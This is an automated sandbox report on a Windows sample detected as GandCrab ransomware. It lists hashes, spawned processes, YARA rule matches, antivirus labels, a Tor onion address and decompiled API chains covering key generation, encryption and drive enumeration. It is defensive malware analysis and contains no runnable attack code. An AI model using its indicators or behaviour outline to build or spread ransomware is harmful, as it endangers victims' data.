Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
IJr8RvvhZ3.exe

Overview

General Information

Sample Name:IJr8RvvhZ3.exe
Analysis ID:694560
MD5:b77359bc85030f5f856b8010c0ddf6a8
SHA1:5bff219a3d20203a239a23db69385f2611e67f5d
SHA256:afd36e5d309ba8576b7e6a31ab1b3af4c3c0530052a2c31b97c688c0e2515005
Tags:exe
Infos:

Detection

Gandcrab, ReflectiveLoader
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Yara detected Gandcrab
Multi AV Scanner detection for submitted file
Malicious sample detected (through community Yara rule)
Yara detected ReflectiveLoader
Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Antivirus detection for dropped file
Creates multiple autostart registry keys
Found evasive API chain (may stop execution after checking mutex)
Contains functionality to determine the online IP of the system
Found Tor onion address
Machine Learning detection for sample
May check the online IP address of the machine
Machine Learning detection for dropped file
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
Antivirus or Machine Learning detection for unpacked file
Detected potential crypto function
Contains functionality to query CPU information (cpuid)
Contains functionality to dynamically determine API calls
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Queries information about the installed CPU (vendor, model number etc)
PE file contains an invalid checksum
Drops PE files
Contains functionality to read the PEB
Contains functionality to enumerate device drivers
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Checks for available system drives (often done to infect USB drives)
Uses Microsoft's Enhanced Cryptographic Provider

Classification

  • System is w10x64
  • IJr8RvvhZ3.exe (PID: 732 cmdline: "C:\Users\user\Desktop\IJr8RvvhZ3.exe" MD5: B77359BC85030F5F856B8010C0DDF6A8)
  • mqsmvj.exe (PID: 4652 cmdline: "C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exe" MD5: 937D3395BC50812DBAB14034E2FCC25B)
  • mqsmvj.exe (PID: 476 cmdline: "C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exe" MD5: 937D3395BC50812DBAB14034E2FCC25B)
  • mqsmvj.exe (PID: 5964 cmdline: "C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exe" MD5: 937D3395BC50812DBAB14034E2FCC25B)
  • mqsmvj.exe (PID: 5524 cmdline: "C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exe" MD5: 937D3395BC50812DBAB14034E2FCC25B)
  • mqsmvj.exe (PID: 3824 cmdline: "C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exe" MD5: 937D3395BC50812DBAB14034E2FCC25B)
  • mqsmvj.exe (PID: 5304 cmdline: "C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exe" MD5: 937D3395BC50812DBAB14034E2FCC25B)
  • mqsmvj.exe (PID: 4828 cmdline: "C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exe" MD5: 937D3395BC50812DBAB14034E2FCC25B)
  • mqsmvj.exe (PID: 2228 cmdline: "C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exe" MD5: 937D3395BC50812DBAB14034E2FCC25B)
  • mqsmvj.exe (PID: 244 cmdline: "C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exe" MD5: 937D3395BC50812DBAB14034E2FCC25B)
  • mqsmvj.exe (PID: 4940 cmdline: "C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exe" MD5: 937D3395BC50812DBAB14034E2FCC25B)
  • mqsmvj.exe (PID: 4864 cmdline: "C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exe" MD5: 937D3395BC50812DBAB14034E2FCC25B)
  • mqsmvj.exe (PID: 5160 cmdline: "C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exe" MD5: 937D3395BC50812DBAB14034E2FCC25B)
  • mqsmvj.exe (PID: 5636 cmdline: "C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exe" MD5: 937D3395BC50812DBAB14034E2FCC25B)
  • mqsmvj.exe (PID: 2564 cmdline: "C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exe" MD5: 937D3395BC50812DBAB14034E2FCC25B)
  • mqsmvj.exe (PID: 4956 cmdline: "C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exe" MD5: 937D3395BC50812DBAB14034E2FCC25B)
  • mqsmvj.exe (PID: 4480 cmdline: "C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exe" MD5: 937D3395BC50812DBAB14034E2FCC25B)
  • mqsmvj.exe (PID: 5768 cmdline: "C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exe" MD5: 937D3395BC50812DBAB14034E2FCC25B)
  • mqsmvj.exe (PID: 6000 cmdline: "C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exe" MD5: 937D3395BC50812DBAB14034E2FCC25B)
  • mqsmvj.exe (PID: 916 cmdline: "C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exe" MD5: 937D3395BC50812DBAB14034E2FCC25B)
  • mqsmvj.exe (PID: 3780 cmdline: "C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exe" MD5: 937D3395BC50812DBAB14034E2FCC25B)
  • cleanup
No configs have been found
SourceRuleDescriptionAuthorStrings
IJr8RvvhZ3.exeReflectiveLoaderDetects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommendedFlorian Roth
  • 0xef92:$x1: ReflectiveLoader
IJr8RvvhZ3.exeSUSP_RANSOMWARE_Indicator_Jul20Detects ransomware indicatorFlorian Roth
  • 0xe8fe:$: DECRYPT.txt
  • 0xe964:$: DECRYPT.txt
IJr8RvvhZ3.exeJoeSecurity_ReflectiveLoaderYara detected ReflectiveLoaderJoe Security
    IJr8RvvhZ3.exeINDICATOR_SUSPICIOUS_ReflectiveLoaderdetects Reflective DLL injection artifactsditekSHen
    • 0xef91:$s1: _ReflectiveLoader@
    • 0xef92:$s2: ReflectiveLoader@
    IJr8RvvhZ3.exeGandcrabGandcrab Payloadkevoreilly
    • 0xe5c8:$string3: action=result&e_files=%d&e_size=%I64u&e_time=%d&
    Click to see the 1 entries
    SourceRuleDescriptionAuthorStrings
    C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exeReflectiveLoaderDetects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommendedFlorian Roth
    • 0xef92:$x1: ReflectiveLoader
    C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exeSUSP_RANSOMWARE_Indicator_Jul20Detects ransomware indicatorFlorian Roth
    • 0xe8fe:$: DECRYPT.txt
    • 0xe964:$: DECRYPT.txt
    C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exeJoeSecurity_ReflectiveLoaderYara detected ReflectiveLoaderJoe Security
      C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exeINDICATOR_SUSPICIOUS_ReflectiveLoaderdetects Reflective DLL injection artifactsditekSHen
      • 0xef91:$s1: _ReflectiveLoader@
      • 0xef92:$s2: ReflectiveLoader@
      C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exeGandcrabGandcrab Payloadkevoreilly
      • 0xe5c8:$string3: action=result&e_files=%d&e_size=%I64u&e_time=%d&
      Click to see the 1 entries
      SourceRuleDescriptionAuthorStrings
      0000000C.00000002.344084967.000000000F592000.00000004.00000001.01000000.00000006.sdmpJoeSecurity_GandcrabYara detected GandcrabJoe Security
        00000010.00000002.406166723.000000000F592000.00000004.00000001.01000000.00000006.sdmpJoeSecurity_GandcrabYara detected GandcrabJoe Security
          0000001C.00000000.542136140.000000000F58A000.00000002.00000001.01000000.00000006.sdmpJoeSecurity_ReflectiveLoaderYara detected ReflectiveLoaderJoe Security
            0000001E.00000002.598229388.000000000F592000.00000004.00000001.01000000.00000006.sdmpJoeSecurity_GandcrabYara detected GandcrabJoe Security
              00000017.00000003.471429233.0000000003A70000.00000004.00001000.00020000.00000000.sdmpReflectiveLoaderDetects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommendedFlorian Roth
              • 0xef92:$x1: ReflectiveLoader
              Click to see the 181 entries
              SourceRuleDescriptionAuthorStrings
              23.0.mqsmvj.exe.f580000.0.unpackReflectiveLoaderDetects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommendedFlorian Roth
              • 0xef92:$x1: ReflectiveLoader
              23.0.mqsmvj.exe.f580000.0.unpackSUSP_RANSOMWARE_Indicator_Jul20Detects ransomware indicatorFlorian Roth
              • 0xe8fe:$: DECRYPT.txt
              • 0xe964:$: DECRYPT.txt
              23.0.mqsmvj.exe.f580000.0.unpackJoeSecurity_ReflectiveLoaderYara detected ReflectiveLoaderJoe Security
                23.0.mqsmvj.exe.f580000.0.unpackINDICATOR_SUSPICIOUS_ReflectiveLoaderdetects Reflective DLL injection artifactsditekSHen
                • 0xef91:$s1: _ReflectiveLoader@
                • 0xef92:$s2: ReflectiveLoader@
                23.0.mqsmvj.exe.f580000.0.unpackGandcrabGandcrab Payloadkevoreilly
                • 0xe5c8:$string3: action=result&e_files=%d&e_size=%I64u&e_time=%d&
                Click to see the 442 entries
                No Sigma rule has matched
                No Snort rule has matched

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Source: IJr8RvvhZ3.exeVirustotal: Detection: 87%Perma Link
                Source: IJr8RvvhZ3.exeMetadefender: Detection: 86%Perma Link
                Source: IJr8RvvhZ3.exeReversingLabs: Detection: 96%
                Source: IJr8RvvhZ3.exeAvira: detected
                Source: http://gdcbmuveqjsli57x.onion/63b5ce1c617217a5Avira URL Cloud: Label: malware
                Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exeAvira: detection malicious, Label: TR/Dropper.Gen
                Source: IJr8RvvhZ3.exeJoe Sandbox ML: detected
                Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exeJoe Sandbox ML: detected
                Source: 25.3.mqsmvj.exe.3490000.0.unpackAvira: Label: TR/Patched.Ren.Gen
                Source: 3.3.mqsmvj.exe.3790000.0.unpackAvira: Label: TR/Patched.Ren.Gen
                Source: 27.0.mqsmvj.exe.f580000.0.unpackAvira: Label: TR/Dropper.Gen
                Source: 22.0.mqsmvj.exe.f580000.0.unpackAvira: Label: TR/Dropper.Gen
                Source: 25.2.mqsmvj.exe.f580000.0.unpackAvira: Label: TR/Dropper.Gen
                Source: 30.0.mqsmvj.exe.f580000.0.unpackAvira: Label: TR/Dropper.Gen
                Source: 0.0.IJr8RvvhZ3.exe.f140000.0.unpackAvira: Label: TR/Dropper.Gen
                Source: 34.2.mqsmvj.exe.f580000.0.unpackAvira: Label: TR/Dropper.Gen
                Source: 39.2.mqsmvj.exe.f580000.0.unpackAvira: Label: TR/Dropper.Gen
                Source: 38.0.mqsmvj.exe.f580000.0.unpackAvira: Label: TR/Dropper.Gen
                Source: 36.0.mqsmvj.exe.f580000.0.unpackAvira: Label: TR/Dropper.Gen
                Source: 23.0.mqsmvj.exe.f580000.0.unpackAvira: Label: TR/Dropper.Gen
                Source: 22.2.mqsmvj.exe.f580000.0.unpackAvira: Label: TR/Dropper.Gen
                Source: 28.0.mqsmvj.exe.f580000.0.unpackAvira: Label: TR/Dropper.Gen
                Source: 19.2.mqsmvj.exe.f580000.0.unpackAvira: Label: TR/Dropper.Gen
                Source: 35.2.mqsmvj.exe.f580000.0.unpackAvira: Label: TR/Dropper.Gen
                Source: 14.3.mqsmvj.exe.32b0000.0.unpackAvira: Label: TR/Patched.Ren.Gen
                Source: 3.0.mqsmvj.exe.f580000.0.unpackAvira: Label: TR/Dropper.Gen
                Source: 16.2.mqsmvj.exe.f580000.0.unpackAvira: Label: TR/Dropper.Gen
                Source: 14.0.mqsmvj.exe.f580000.0.unpackAvira: Label: TR/Dropper.Gen
                Source: 28.3.mqsmvj.exe.3130000.0.unpackAvira: Label: TR/Patched.Ren.Gen
                Source: 16.0.mqsmvj.exe.f580000.0.unpackAvira: Label: TR/Dropper.Gen
                Source: 15.2.mqsmvj.exe.f580000.0.unpackAvira: Label: TR/Dropper.Gen
                Source: 35.3.mqsmvj.exe.3970000.0.unpackAvira: Label: TR/Patched.Ren.Gen
                Source: 19.0.mqsmvj.exe.f580000.0.unpackAvira: Label: TR/Dropper.Gen
                Source: 23.3.mqsmvj.exe.3a70000.0.unpackAvira: Label: TR/Patched.Ren.Gen
                Source: 19.3.mqsmvj.exe.3930000.0.unpackAvira: Label: TR/Patched.Ren.Gen
                Source: 15.0.mqsmvj.exe.f580000.0.unpackAvira: Label: TR/Dropper.Gen
                Source: 39.3.mqsmvj.exe.2fb0000.0.unpackAvira: Label: TR/Patched.Ren.Gen
                Source: 38.2.mqsmvj.exe.f580000.0.unpackAvira: Label: TR/Dropper.Gen
                Source: 11.3.mqsmvj.exe.3290000.0.unpackAvira: Label: TR/Patched.Ren.Gen
                Source: 37.2.mqsmvj.exe.f580000.0.unpackAvira: Label: TR/Dropper.Gen
                Source: 0.2.IJr8RvvhZ3.exe.f140000.0.unpackAvira: Label: TR/Dropper.Gen
                Source: 26.0.mqsmvj.exe.f580000.0.unpackAvira: Label: TR/Dropper.Gen
                Source: 11.2.mqsmvj.exe.f580000.0.unpackAvira: Label: TR/Dropper.Gen
                Source: 39.0.mqsmvj.exe.f580000.0.unpackAvira: Label: TR/Dropper.Gen
                Source: 26.2.mqsmvj.exe.f580000.0.unpackAvira: Label: TR/Dropper.Gen
                Source: 16.3.mqsmvj.exe.3b50000.0.unpackAvira: Label: TR/Patched.Ren.Gen
                Source: 27.2.mqsmvj.exe.f580000.0.unpackAvira: Label: TR/Dropper.Gen
                Source: 12.2.mqsmvj.exe.f580000.0.unpackAvira: Label: TR/Dropper.Gen
                Source: 30.2.mqsmvj.exe.f580000.0.unpackAvira: Label: TR/Dropper.Gen
                Source: 25.0.mqsmvj.exe.f580000.0.unpackAvira: Label: TR/Dropper.Gen
                Source: 3.2.mqsmvj.exe.f580000.0.unpackAvira: Label: TR/Dropper.Gen
                Source: 12.3.mqsmvj.exe.2fb0000.0.unpackAvira: Label: TR/Patched.Ren.Gen
                Source: 28.2.mqsmvj.exe.f580000.0.unpackAvira: Label: TR/Dropper.Gen
                Source: 34.0.mqsmvj.exe.f580000.0.unpackAvira: Label: TR/Dropper.Gen
                Source: 36.2.mqsmvj.exe.f580000.0.unpackAvira: Label: TR/Dropper.Gen
                Source: 23.2.mqsmvj.exe.f580000.0.unpackAvira: Label: TR/Dropper.Gen
                Source: 35.0.mqsmvj.exe.f580000.0.unpackAvira: Label: TR/Dropper.Gen
                Source: 30.3.mqsmvj.exe.3470000.0.unpackAvira: Label: TR/Patched.Ren.Gen
                Source: 37.3.mqsmvj.exe.3bc0000.0.unpackAvira: Label: TR/Patched.Ren.Gen
                Source: 0.3.IJr8RvvhZ3.exe.3210000.0.unpackAvira: Label: TR/Patched.Ren.Gen
                Source: 11.0.mqsmvj.exe.f580000.0.unpackAvira: Label: TR/Dropper.Gen
                Source: 27.3.mqsmvj.exe.3490000.0.unpackAvira: Label: TR/Patched.Ren.Gen
                Source: 37.0.mqsmvj.exe.f580000.0.unpackAvira: Label: TR/Dropper.Gen
                Source: 12.0.mqsmvj.exe.f580000.0.unpackAvira: Label: TR/Dropper.Gen
                Source: 14.2.mqsmvj.exe.f580000.0.unpackAvira: Label: TR/Dropper.Gen
                Source: C:\Users\user\Desktop\IJr8RvvhZ3.exeCode function: 0_2_0F148400 VirtualAlloc,CryptAcquireContextW,VirtualAlloc,GetModuleHandleA,LoadLibraryA,GetProcAddress,CryptReleaseContext,VirtualFree,CryptReleaseContext,VirtualFree,0_2_0F148400
                Source: C:\Users\user\Desktop\IJr8RvvhZ3.exeCode function: 0_2_0F144B20 EntryPoint,Sleep,ExitProcess,CreateThread,WaitForSingleObject,TerminateThread,CloseHandle,VirtualAlloc,GetModuleFileNameW,VirtualFree,ExitProcess,Sleep,lstrlenA,VirtualAlloc,CryptStringToBinaryA,ExitProcess,InitializeCriticalSection,DeleteCriticalSection,VirtualAlloc,GetModuleFileNameW,VirtualFree,ShellExecuteW,ExitThread,0_2_0F144B20
                Source: C:\Users\user\Desktop\IJr8RvvhZ3.exeCode function: 0_2_0F145860 VirtualAlloc,VirtualFree,CryptBinaryToStringA,CryptBinaryToStringA,CryptBinaryToStringA,lstrlenA,lstrlenA,lstrlenA,VirtualAlloc,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrcatW,lstrcatW,lstrlenW,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcatW,VirtualFree,VirtualFree,VirtualFree,lstrcatW,lstrlenW,lstrlenW,lstrlenA,MultiByteToWideChar,lstrcatW,lstrlenW,lstrlenA,MultiByteToWideChar,lstrcatW,lstrlenW,lstrlenW,VirtualAlloc,lstrlenW,lstrlenW,VirtualFree,lstrlenW,VirtualAlloc,wsprintfA,lstrlenW,CryptBinaryToStringA,GetLastError,lstrlenA,VirtualAlloc,lstrlenA,lstrlenA,lstrlenA,lstrlenA,MultiByteToWideChar,VirtualFree,VirtualFree,VirtualFree,VirtualFree,VirtualFree,VirtualFree,VirtualFree,VirtualFree,VirtualFree,VirtualFree,0_2_0F145860
                Source: C:\Users\user\Desktop\IJr8RvvhZ3.exeCode function: 0_2_0F1482B0 CryptAcquireContextW,VirtualAlloc,GetModuleHandleA,LoadLibraryA,GetProcAddress,CryptReleaseContext,VirtualFree,CryptReleaseContext,VirtualFree,0_2_0F1482B0
                Source: C:\Users\user\Desktop\IJr8RvvhZ3.exeCode function: 0_2_0F1463E0 CryptAcquireContextW,GetLastError,CryptAcquireContextW,CryptGenKey,CryptExportKey,CryptExportKey,CryptDestroyKey,CryptReleaseContext,CryptAcquireContextW,0_2_0F1463E0
                Source: C:\Users\user\Desktop\IJr8RvvhZ3.exeCode function: 0_2_0F145670 VirtualAlloc,VirtualAlloc,wsprintfW,lstrlenW,lstrlenW,VirtualFree,lstrlenW,VirtualAlloc,wsprintfA,VirtualAlloc,CryptBinaryToStringA,GetLastError,lstrlenA,lstrlenA,VirtualAlloc,lstrlenA,lstrlenA,lstrlenA,VirtualFree,VirtualFree,VirtualFree,0_2_0F145670
                Source: C:\Users\user\Desktop\IJr8RvvhZ3.exeCode function: 0_2_0F146660 EnterCriticalSection,CryptAcquireContextW,GetLastError,CryptAcquireContextW,CryptImportKey,CryptGetKeyParam,CryptEncrypt,GetLastError,CryptReleaseContext,LeaveCriticalSection,0_2_0F146660
                Source: C:\Users\user\Desktop\IJr8RvvhZ3.exeCode function: 0_2_0F1453D0 lstrlenA,VirtualAlloc,CryptStringToBinaryA,lstrlenA,VirtualAlloc,lstrcpyA,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,VirtualFree,GetLastError,lstrlenA,lstrlenA,VirtualAlloc,VirtualAlloc,VirtualAlloc,lstrcatA,lstrlenA,lstrlenW,lstrlenA,VirtualFree,VirtualFree,VirtualFree,VirtualFree,InternetCloseHandle,0_2_0F1453D0
                Source: C:\Users\user\Desktop\IJr8RvvhZ3.exeCode function: 0_2_0F1434F0 lstrlenA,VirtualAlloc,VirtualAlloc,CryptStringToBinaryA,VirtualAlloc,VirtualAlloc,wsprintfW,wsprintfW,wsprintfW,VirtualFree,0_2_0F1434F0
                Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exeCode function: 3_2_0F585860 VirtualAlloc,VirtualFree,CryptBinaryToStringA,CryptBinaryToStringA,CryptBinaryToStringA,lstrlenA,lstrlenA,lstrlenA,VirtualAlloc,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrcatW,lstrcatW,lstrlenW,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcatW,VirtualFree,VirtualFree,VirtualFree,lstrcatW,lstrlenW,lstrlenW,lstrlenA,MultiByteToWideChar,lstrcatW,lstrlenW,lstrlenA,MultiByteToWideChar,lstrcatW,lstrlenW,lstrlenW,VirtualAlloc,lstrlenW,lstrlenW,VirtualFree,lstrlenW,VirtualAlloc,wsprintfA,lstrlenW,CryptBinaryToStringA,GetLastError,lstrlenA,VirtualAlloc,lstrlenA,lstrlenA,lstrlenA,lstrlenA,MultiByteToWideChar,VirtualFree,VirtualFree,VirtualFree,VirtualFree,VirtualFree,VirtualFree,VirtualFree,VirtualFree,VirtualFree,VirtualFree,3_2_0F585860
                Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exeCode function: 3_2_0F584B20 EntryPoint,Sleep,ExitProcess,CreateThread,WaitForSingleObject,TerminateThread,CloseHandle,VirtualAlloc,GetModuleFileNameW,VirtualFree,ExitProcess,Sleep,lstrlenA,VirtualAlloc,CryptStringToBinaryA,ExitProcess,InitializeCriticalSection,DeleteCriticalSection,VirtualAlloc,GetModuleFileNameW,VirtualFree,ShellExecuteW,ExitThread,3_2_0F584B20
                Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exeCode function: 3_2_0F5863E0 CryptAcquireContextW,GetLastError,CryptAcquireContextW,CryptGenKey,CryptExportKey,CryptExportKey,CryptDestroyKey,CryptReleaseContext,CryptAcquireContextW,3_2_0F5863E0
                Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exeCode function: 3_2_0F5882B0 CryptAcquireContextW,VirtualAlloc,GetModuleHandleA,LoadLibraryA,GetProcAddress,CryptReleaseContext,VirtualFree,CryptReleaseContext,VirtualFree,3_2_0F5882B0
                Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exeCode function: 3_2_0F585670 VirtualAlloc,VirtualAlloc,wsprintfW,lstrlenW,lstrlenW,VirtualFree,lstrlenW,VirtualAlloc,wsprintfA,VirtualAlloc,CryptBinaryToStringA,GetLastError,lstrlenA,lstrlenA,VirtualAlloc,lstrlenA,lstrlenA,lstrlenA,VirtualFree,VirtualFree,VirtualFree,3_2_0F585670
                Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exeCode function: 3_2_0F586660 EnterCriticalSection,CryptAcquireContextW,GetLastError,CryptAcquireContextW,CryptImportKey,CryptGetKeyParam,CryptEncrypt,GetLastError,CryptReleaseContext,LeaveCriticalSection,3_2_0F586660
                Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exeCode function: 3_2_0F588400 VirtualAlloc,CryptAcquireContextW,VirtualAlloc,GetModuleHandleA,LoadLibraryA,GetProcAddress,CryptReleaseContext,VirtualFree,CryptReleaseContext,VirtualFree,3_2_0F588400
                Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exeCode function: 3_2_0F5853D0 lstrlenA,VirtualAlloc,CryptStringToBinaryA,lstrlenA,VirtualAlloc,lstrcpyA,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,VirtualFree,GetLastError,lstrlenA,lstrlenA,VirtualAlloc,VirtualAlloc,VirtualAlloc,lstrcatA,lstrlenA,lstrlenW,lstrlenA,VirtualFree,VirtualFree,VirtualFree,VirtualFree,InternetCloseHandle,3_2_0F5853D0
                Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exeCode function: 3_2_0F5834F0 lstrlenA,VirtualAlloc,VirtualAlloc,CryptStringToBinaryA,VirtualAlloc,VirtualAlloc,wsprintfW,wsprintfW,wsprintfW,VirtualFree,3_2_0F5834F0
                Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exeCode function: 11_2_0F585860 VirtualAlloc,VirtualFree,CryptBinaryToStringA,CryptBinaryToStringA,CryptBinaryToStringA,lstrlenA,lstrlenA,lstrlenA,VirtualAlloc,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrlenA,lstrcatW,lstrcatW,lstrlenW,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcatW,VirtualFree,VirtualFree,VirtualFree,lstrcatW,lstrlenW,lstrlenW,lstrlenA,MultiByteToWideChar,lstrcatW,lstrlenW,lstrlenA,MultiByteToWideChar,lstrcatW,lstrlenW,lstrlenW,VirtualAlloc,lstrlenW,lstrlenW,VirtualFree,lstrlenW,VirtualAlloc,wsprintfA,lstrlenW,CryptBinaryToStringA,GetLastError,lstrlenA,VirtualAlloc,lstrlenA,lstrlenA,lstrlenA,lstrlenA,MultiByteToWideChar,VirtualFree,VirtualFree,VirtualFree,VirtualFree,VirtualFree,VirtualFree,VirtualFree,VirtualFree,VirtualFree,VirtualFree,11_2_0F585860
                Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exeCode function: 11_2_0F584B20 EntryPoint,Sleep,ExitProcess,CreateThread,WaitForSingleObject,TerminateThread,CloseHandle,VirtualAlloc,GetModuleFileNameW,VirtualFree,ExitProcess,Sleep,lstrlenA,VirtualAlloc,CryptStringToBinaryA,ExitProcess,InitializeCriticalSection,DeleteCriticalSection,VirtualAlloc,GetModuleFileNameW,VirtualFree,ShellExecuteW,ExitThread,11_2_0F584B20
                Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exeCode function: 11_2_0F5863E0 CryptAcquireContextW,GetLastError,CryptAcquireContextW,CryptGenKey,CryptExportKey,CryptExportKey,CryptDestroyKey,CryptReleaseContext,CryptAcquireContextW,11_2_0F5863E0
                Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exeCode function: 11_2_0F5882B0 CryptAcquireContextW,VirtualAlloc,GetModuleHandleA,LoadLibraryA,GetProcAddress,CryptReleaseContext,VirtualFree,CryptReleaseContext,VirtualFree,11_2_0F5882B0
                Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exeCode function: 11_2_0F585670 VirtualAlloc,VirtualAlloc,wsprintfW,lstrlenW,lstrlenW,VirtualFree,lstrlenW,VirtualAlloc,wsprintfA,VirtualAlloc,CryptBinaryToStringA,GetLastError,lstrlenA,lstrlenA,VirtualAlloc,lstrlenA,lstrlenA,lstrlenA,VirtualFree,VirtualFree,VirtualFree,11_2_0F585670
                Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exeCode function: 11_2_0F588400 CryptAcquireContextW,VirtualAlloc,GetModuleHandleA,LoadLibraryA,GetProcAddress,CryptReleaseContext,VirtualFree,CryptReleaseContext,VirtualFree,11_2_0F588400
                Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exeCode function: 11_2_0F5853D0 lstrlenA,VirtualAlloc,CryptStringToBinaryA,lstrlenA,VirtualAlloc,lstrcpyA,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,VirtualFree,GetLastError,lstrlenA,lstrlenA,VirtualAlloc,VirtualAlloc,VirtualAlloc,lstrcatA,lstrlenA,lstrlenW,lstrlenA,VirtualFree,VirtualFree,VirtualFree,VirtualFree,InternetCloseHandle,11_2_0F5853D0
                Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exeCode function: 11_2_0F5834F0 lstrlenA,VirtualAlloc,VirtualAlloc,CryptStringToBinaryA,VirtualAlloc,VirtualAlloc,wsprintfW,wsprintfW,wsprintfW,VirtualFree,11_2_0F5834F0
                Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exeCode function: 11_2_0F586682 CryptAcquireContextW,GetLastError,CryptAcquireContextW,CryptImportKey,CryptGetKeyParam,CryptEncrypt,GetLastError,CryptReleaseContext,LeaveCriticalSection,11_2_0F586682
                Source: IJr8RvvhZ3.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: IJr8RvvhZ3.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH
                Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exeFile opened: z:
                Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exeFile opened: x:
                Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exeFile opened: v:
                Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exeFile opened: t:
                Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exeFile opened: r:
                Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exeFile opened: p:
                Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exeFile opened: n:
                Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exeFile opened: l:
                Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exeFile opened: j:
                Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exeFile opened: h:
                Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exeFile opened: f:
                Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exeFile opened: b:
                Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exeFile opened: y:
                Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exeFile opened: w:
                Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exeFile opened: u:
                Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exeFile opened: s:
                Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exeFile opened: q:
                Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exeFile opened: o:
                Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exeFile opened: m:
                Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exeFile opened: k:
                Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exeFile opened: i:
                Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exeFile opened: g:
                Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exeFile opened: e:
                Source: C:\Users\user\AppData\Roaming\Microsoft\mqsmvj.exeFile opened: a:
